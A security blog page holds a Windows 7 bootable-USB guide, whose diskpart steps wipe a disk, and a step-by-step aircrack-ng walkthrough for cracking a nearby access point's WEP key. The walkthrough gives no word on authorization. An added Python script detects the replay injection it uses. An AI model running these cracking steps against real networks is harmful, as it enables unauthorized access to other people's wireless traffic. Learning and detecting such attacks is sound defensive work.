security.crudtastic.com

Security Nerd Stuff

Browsing Posts tagged eee pc

So, I guess this isn’t really a security related post … but someone will find it useful I hope! Earlier today I wanted to upgrade my little notebook to the latest version of Windows 7 .. but of course most netbooks don’t have a DVD drive so you need to boot it off a USB stick.

You will need the following to create this bootable USB stick

  • USB stick (4GB will do just fine)
  • Vista or Windows 7 installation
  • Windows 7 media (can be used with Vista as well)

So first of all we need to format the USB stick .. Insert the usual rubbish about it wiping everything on the drive and to back it all up etc etc (LAME). You do this by doing the following

  1. Plug in your USB Flash Drive
  2. Open a command prompt as administrator (Right click on Start > All Programs > Accessories > Command Prompt and select “Run as administrator”)
  3. Find the drive number of your USB Drive by typing the following into the Command Prompt window:
    diskpart
    list disk

    The number of your USB drive will be listed. You’ll need this for the next step.  I’ll assume that the USB flash drive is disk 1.
  4. Format the drive by typing the next instructions into the same window. Replace the number “1” with the number of your disk below.
    select disk 1
    clean
    create partition primary
    select partition 1
    active
    format fs=NTFS
    assign
    exit
  5. When that is done you’ll have a formatted USB flash drive ready to be made bootable.

OK .. next we need to make the drive bootable .. this is pretty easy!

    1. Go to your Windows 7 install directory (on the DVD).
    2. Change directory to the DVD’s boot directory where bootsect lives:
      d:
      cd d:\boot
    3. Use bootsect to set the USB as a bootable NTFS drive prepared for a Vista/7 image. I’m assuming that your USB flash drive has been labeled disk G:\ by the computer:
      bootsect /nt60 g:
    4. We’re done for this part

The final step (apart from actually running the install) is to copy the contents of the Windows 7 DVD to the USB stick. You can use Windows explorer for this .. too easy huh?

Shove that USB stick into a netbook, power it up, make it boot from the USB stick and watch the magic of Windows 7 begin!!

That’s the basics .. if you have trouble with that you should see if there’s some video tutorials on youtube or something. Good luck team!

I know this has pretty much been done to death .. but for those of you who are just starting out (or just needing a real quick simple explanation) here’s the methodology for you!

First of all you need a PC (I use an ASUS EEE PC – one of the early linux models) and of course BackTrack 3

OK .. now let’s get down to business.

First of all boot into backtrack (I’m not going to explain this .. if you don’t understand drop me a comment or something and I’ll either clear it up in this post .. or I’ll make another post explaining it).

Open up a terminal window and start the wireless card in monitor mode. To do this type

airmon-ng start wifi0

You should notice the following displayed on the screen (or similar – this is all from my EEEPC)

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
ath1 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

Type in the following
airodump-ng ath1

You’ll see a list of wireless access points in your area, their channel, and authentication type, BSSID, ESSID.

Write down or copy to a notepad the BSSID, ESSID and channel.

Open up a new terminal tab and enter the next command
airodump-ng -c channel --bssid BSSID -w filename ath1

BSSID – the access point MAC address.
filename – try and make it something that is easy to remember (usually the name of the AP)
Open another tab in the terminal. It’s time to make an association with the target access point.
Type in
aireplay-ng -1 0 -e SSID -a BSSID ath1

You should see the response, showing association is successful.
SSID – the wireless network name
BSSID – the access point MAC address
OUR MAC – our own wireless card’s MAC address

Open another tab in terminal (thank god for tabs huh)
Now we inject some packets. To do this type
aireplay-ng -3 -b BSSID ath1 -x 500

If there is someone active on the wireless network you should get a lot of packets through pretty quickly. Usually you would wait until you have about 30000 – 40000 packets before moving on to the next step. Either way just let this command run while you’re doing the rest of the steps, if you find you don’t have enough data this will continue running and collecting.

Next, open yet another tab in terminal and type in the following (this will give you the WEP key)

aircrack-ng -b BSSID filename*.cap

The filename is the same one that you set in the earlier step (remember .. the one that is usually the same as the AP). Mine actually comes up as filename-01.cap .. just do an ls and find yours. After a little bit, aircrack will do its thing and you should get your WEP key. If not, keep on collecting data and try again!

One thing to note here: this will default to whatever channel you use when you put your wifi card in monitor mode at the start. If you find that the AP is on a different channel to the one you are using (after you do airodump-ng you should see the channel) go back and do an airmon-ng stop ath1 (or whatever device you have in monitor mode) to stop it, then do an airmon-ng start wifi0 <channel> (where <channel> is 6 or 11 or whatever) and follow the rest of the steps.

That’s all there really is to it

Big thanks to my original source of information – Kal El’s World
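
An added example, not part of the original post: a defender-side check for the packet injection step in the walkthrough above. Replayed frames are retransmissions of one captured encrypted packet, so the same WEP IV and frame length repeat from one transmitter at a high rate (the `-x 500` above asks for 500 packets per second). The frame records are constructed sample data, and the record layout, MAC addresses and thresholds are assumptions.

```python
from collections import defaultdict

# Constructed sample records: (timestamp_s, transmitter MAC, WEP IV hex, frame length).
# Real input would come from a monitor-mode sensor; this layout is an assumption.
def sample_frames():
    frames = []
    # Normal client: a fresh IV for every frame, varied sizes, about 20 frames/s.
    for i in range(40):
        frames.append((i * 0.05, "00:11:22:33:44:55",
                       f"{0x1000 + i:06x}", 90 + (i % 7) * 40))
    # Replay pattern: one frame resent 500 times in one second with the same IV.
    for i in range(500):
        frames.append((i * 0.002, "66:77:88:99:aa:bb", "a1b2c3", 68))
    return sorted(frames)

def detect_replay(frames, window_s=1.0, min_repeats=100):
    """Return {transmitter: peak count} for transmitters that sent at least
    min_repeats frames with an identical (IV, length) pair inside any
    window_s-second span."""
    times = defaultdict(list)
    for ts, mac, iv, length in frames:
        times[(mac, iv, length)].append(ts)
    flagged = {}
    for (mac, iv, length), stamps in times.items():
        stamps.sort()
        start = 0
        for end, ts in enumerate(stamps):
            # Slide the window start forward until it spans <= window_s seconds.
            while ts - stamps[start] > window_s:
                start += 1
            count = end - start + 1
            if count >= min_repeats:
                flagged[mac] = max(flagged.get(mac, 0), count)
    return flagged

if __name__ == "__main__":
    for mac, count in detect_replay(sample_frames()).items():
        print(f"possible replay injection from {mac}: {count} identical frames in 1s")
```

A normal WEP station changes the IV on every frame, so even a busy client never trips the `(IV, length)` repeat counter; only retransmission of a single captured frame does.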